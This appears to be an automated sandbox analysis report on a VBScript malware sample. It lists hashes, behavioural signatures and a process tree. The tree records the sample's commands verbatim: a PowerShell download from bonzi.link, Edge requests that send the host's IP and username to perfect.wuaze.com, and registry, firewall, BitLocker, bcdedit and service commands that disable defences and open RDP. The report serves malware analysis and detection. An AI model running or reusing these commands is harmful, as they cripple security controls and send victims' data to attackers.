Analysis
max time kernel
270s
max time network
204s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags
arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
submitted
19-05-2024 17:11
Static task
static1
Behavioral task
behavioral1
Sample
malware.vbs
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
malware.vbs
Resource
win10v2004-20240508-en
General
Target
malware.vbs
Size
7KB
MD5
6e0473af4fbc9223bb02c4cbbad2ae4e
SHA1
e710bf9f0dc329d34644f869d580eb378bf179ec
SHA256
c7c562faf05a37549c96db450594051b30e2f4fc3010918e25d198ad028f1b1f
SHA512
e0de847f7fe1c0965cc1d2bb019441b7cd05890ba3d19c618a396de334e58dcca2fd5867756fb2f9d80d06f6fd85fc13f12c8c4855eb7844ff99bb3ca67a1444
SSDEEP
96:qD2WSNb8mN8r9f4PPfMSHnx2gqoAqb1j8RW8E/zmdPzWdEKuWP2W9Nukim26I95F:qD8qrZgX7xrCdPidfbj26I9z
Malware Config
Extracted
http://bonzi.link/Bon.zip
Extracted
https://bonzi.link/Bon.zip
Signatures
Processes:
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | reg.exe
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
Processes:
pid | process
3212 | bcdedit.exe
1704 | bcdedit.exe
5924 | bcdedit.exe
6024 | bcdedit.exe
Blocklisted process makes network request 2 IoCs
Processes:
flow | pid | process
35 | 4984 | powershell.exe
40 | 5008 | powershell.exe
Creates new service(s) 2 TTPs
Disables RegEdit via registry modification 1 IoCs
Processes:
description | ioc | process
Set value (int) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | reg.exe
Disables Task Manager via registry modification
Modifies Windows Firewall 2 TTPs 10 IoCs
Processes:
pid | process
3128 | netsh.exe
5492 | netsh.exe
5688 | netsh.exe
5792 | netsh.exe
5624 | netsh.exe
4436 | netsh.exe
3024 | netsh.exe
4228 | netsh.exe
3848 | netsh.exe
5560 | netsh.exe
Possible privilege escalation attempt 8 IoCs
Processes:
pid | process
5284 | takeown.exe
5240 | icacls.exe
1704 | takeown.exe
3876 | icacls.exe
1016 | takeown.exe
5832 | icacls.exe
5208 | takeown.exe
5132 | icacls.exe
Modifies file permissions 1 TTPs 8 IoCs
Processes:
pid | process
1016 | takeown.exe
5832 | icacls.exe
5208 | takeown.exe
5132 | icacls.exe
5284 | takeown.exe
5240 | icacls.exe
1704 | takeown.exe
3876 | icacls.exe
Drops file in System32 directory 19 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db | OpenWith.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db | OpenWith.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db | OpenWith.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db | OpenWith.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db | OpenWith.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db | OpenWith.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db | OpenWith.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db | OpenWith.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db | OpenWith.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db | OpenWith.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db | OpenWith.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db | OpenWith.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db | OpenWith.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db | OpenWith.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db | OpenWith.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db | OpenWith.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db | OpenWith.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db | OpenWith.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db | OpenWith.exe
Drops file in Windows directory 1 IoCs
Processes:
description | ioc | process
File created | C:\Windows\rescache\_merged\431186354\3486321857.pri | netsh.exe
Launches sc.exe 2 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
pid | process
3876 | sc.exe
6028 | sc.exe
Processes:
pid | process
4984 | powershell.exe
3136 | powershell.exe
5008 | powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Delays execution with timeout.exe 1 IoCs
Processes:
pid | process
5644 | timeout.exe
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
Processes:
pid | process
4432 | ipconfig.exe
5584 | ipconfig.exe
Kills process with taskkill 3 IoCs
Processes:
pid | process
5500 | taskkill.exe
5444 | taskkill.exe
5588 | taskkill.exe
Modifies data under HKEY_USERS 64 IoCs
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
pid | process
4324 | NOTEPAD.EXE
Runs net.exe
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
pid | process
4984 | powershell.exe
4984 | powershell.exe
4984 | powershell.exe
3136 | powershell.exe
3136 | powershell.exe
5008 | powershell.exe
5008 | powershell.exe
4020 | msedge.exe
4020 | msedge.exe
4128 | msedge.exe
4128 | msedge.exe
3084 | identity_helper.exe
3084 | identity_helper.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
Processes:
pid | process
4128 | msedge.exe (9 identical rows)
Suspicious use of AdjustPrivilegeToken 28 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 4984 | powershell.exe
Token: SeDebugPrivilege | 3136 | powershell.exe
Token: SeDebugPrivilege | 5008 | powershell.exe
Token: SeShutdownPrivilege | 1368 | powercfg.exe
Token: SeCreatePagefilePrivilege | 1368 | powercfg.exe
Token: SeShutdownPrivilege | 4204 | powercfg.exe
Token: SeCreatePagefilePrivilege | 4204 | powercfg.exe
Token: SeShutdownPrivilege | 4452 | powercfg.exe
Token: SeCreatePagefilePrivilege | 4452 | powercfg.exe
Token: SeShutdownPrivilege | 4220 | powercfg.exe
Token: SeCreatePagefilePrivilege | 4220 | powercfg.exe
Token: SeDebugPrivilege | 1128 | whoami.exe
Token: SeTakeOwnershipPrivilege | 1704 | takeown.exe
Token: SeShutdownPrivilege | 5224 | powercfg.exe
Token: SeCreatePagefilePrivilege | 5224 | powercfg.exe
Token: SeShutdownPrivilege | 5272 | powercfg.exe
Token: SeCreatePagefilePrivilege | 5272 | powercfg.exe
Token: SeShutdownPrivilege | 5328 | powercfg.exe
Token: SeCreatePagefilePrivilege | 5328 | powercfg.exe
Token: SeShutdownPrivilege | 5440 | powercfg.exe
Token: SeCreatePagefilePrivilege | 5440 | powercfg.exe
Token: SeDebugPrivilege | 5716 | whoami.exe
Token: SeTakeOwnershipPrivilege | 1016 | takeown.exe
Token: SeTakeOwnershipPrivilege | 5208 | takeown.exe
Token: SeTakeOwnershipPrivilege | 5284 | takeown.exe
Token: SeDebugPrivilege | 5444 | taskkill.exe
Token: SeDebugPrivilege | 5588 | taskkill.exe
Token: SeDebugPrivilege | 5500 | taskkill.exe
Suspicious use of FindShellTrayWindow 25 IoCs
Processes:
pid | process
4128 | msedge.exe (25 identical rows)
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
pid | process
4128 | msedge.exe (24 identical rows)
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
pid | process
5668 | OpenWith.exe
5776 | OpenWith.exe
1212 | OpenWith.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes (tree depth in brackets)
[1] C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\malware.vbs"
[1] C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
[1] C:\Windows\System32\NOTEPAD.EXE
    "C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\malware.bat
    - Opens file in notepad (likely ransom note)
[1] C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe"
    - Suspicious use of WriteProcessMemory
[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://bonzi.link/Bon.zip', 'Bon.zip')"
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Expand-Archive -Path 'BonziBuddy432.exe' -DestinationPath '.'"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bonzi.link/Bon.zip', 'Bon.zip')"
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\malware.bat" "
    - Suspicious use of WriteProcessMemory
[2] C:\Windows\system32\net.exe
    net session
    - Suspicious use of WriteProcessMemory
[3] C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
[2] C:\Windows\system32\powercfg.exe
    powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe
    powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 0
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe
    powercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\powercfg.exe
    powercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 0
    - Suspicious use of AdjustPrivilegeToken
[2] C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="Allow RDP" dir=in action=allow protocol=TCP localport=3389
    - Modifies Windows Firewall
[2] C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="Allow Ping" dir=in action=allow protocol=ICMPv4
    - Modifies Windows Firewall
[2] C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="Allow Outbound" dir=out action=allow
    - Modifies Windows Firewall
[2] C:\Windows\system32\netsh.exe
    netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes
    - Modifies Windows Firewall
[2] C:\Windows\system32\netsh.exe
    netsh advfirewall set allprofiles state off
    - Modifies Windows Firewall
[2] C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
[2] C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f
[2] C:\Windows\system32\reg.exe
    REG IMPORT "C:\Users\Admin\AppData\Local\Temp\disable_winload.reg"
[2] C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f
[2] C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\Desktop\MuiCached" /f
[2] C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\Desktop\MuiCache" /f
[2] C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f
[2] C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f
[2] C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f
[2] C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f
[2] C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
    - UAC bypass
[2] C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
[2] C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableSettingsPage /t REG_DWORD /d 1 /f
[2] C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v PreferredUILanguages /t REG_MULTI_SZ /d ru-RU /f
[2] C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\International" /v sLanguage /t REG_SZ /d rus /f
[2] C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
[2] C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
[2] C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
[2] C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows\System" /v "DisableGPO" /t REG_DWORD /d 1 /f
[2] C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
[2] C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
[2] C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoExplorer /t REG_DWORD /d 1 /f
[2] C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d 0 /f
[2] C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f
[2] C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "EnableScriptBlockLogging" /t REG_DWORD /d 0 /f
[2] C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Undefined" /f
[2] C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ScriptBlockLogging" /t REG_DWORD /d 0 /f
[2] C:\Windows\system32\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f
[2] C:\Windows\system32\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f
[2] C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
[2] C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
    - Disables RegEdit via registry modification
-
  [C:\Windows\system32\cmd.exe] C:\Windows\system32\cmd.exe /c ipconfig | findstr IPv4
    [C:\Windows\system32\ipconfig.exe] ipconfig
      - Gathers network information
    [C:\Windows\system32\findstr.exe] findstr IPv4
  [C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.perfect.wuaze.com/guardar_ip.php?id=10.127.0.95
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    [C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9b3a046f8,0x7ff9b3a04708,0x7ff9b3a04718
    [C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2044 /prefetch:2
    [C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3
      - Suspicious behavior: EnumeratesProcesses
    [C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2672 /prefetch:8
    [C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:1
    [C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1
    [C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe] "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 /prefetch:8
    [C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe] "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
    [C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5076 /prefetch:1
    [C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4172 /prefetch:1
    [C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5824 /prefetch:1
    [C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5860 /prefetch:1
    [C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:1
    [C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6136 /prefetch:1
    [C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,10873780803591564568,459401981514617655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:1
  [C:\Windows\system32\cmd.exe] C:\Windows\system32\cmd.exe /c whoami
    [C:\Windows\system32\whoami.exe] whoami
      - Suspicious use of AdjustPrivilegeToken
  [C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=admin
    [C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9b3a046f8,0x7ff9b3a04708,0x7ff9b3a04718
  [C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://perfect.wuaze.com/guardar_ip.php?id=gsagmhcq\admin
    [C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9b3a046f8,0x7ff9b3a04708,0x7ff9b3a04718
  [C:\Windows\system32\cmd.exe] C:\Windows\system32\cmd.exe /c net user "Admin"
    [C:\Windows\system32\net.exe] net user "Admin"
      [C:\Windows\system32\net1.exe] C:\Windows\system32\net1 user "Admin"
  [C:\Windows\system32\takeown.exe] takeown /f "C:\Windows\System32\notepad.exe"
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
  [C:\Windows\system32\icacls.exe] icacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)
    - Possible privilege escalation attempt
    - Modifies file permissions
  [C:\Windows\system32\manage-bde.exe] manage-bde -off C:
  [C:\Windows\system32\manage-bde.exe] manage-bde -on C: -exclude "C:\Windows" -exclude "C:\Users" -exclude "C:\Program Files" -exclude "C:\Program Files (x86)"
  [C:\Windows\system32\bcdedit.exe] bcdedit /set {default} recoveryenabled yes
    - Modifies boot configuration data using bcdedit
  [C:\Windows\system32\bcdedit.exe] bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    - Modifies boot configuration data using bcdedit
  [C:\Windows\system32\sc.exe] sc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"
    - Launches sc.exe
  [C:\Windows\system32\net.exe] net start MiServicio
    [C:\Windows\system32\net1.exe] C:\Windows\system32\net1 start MiServicio
  [C:\Windows\system32\takeown.exe] takeown /F "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe"
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
  [C:\Windows\system32\icacls.exe] icacls "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe" /grant administrators:F
    - Possible privilege escalation attempt
    - Modifies file permissions
  [C:\Windows\system32\cmd.exe] C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "BackupProductKeyDefault" 2>nul | find "BackupProductKeyDefault"
    [C:\Windows\system32\reg.exe] reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v "BackupProductKeyDefault"
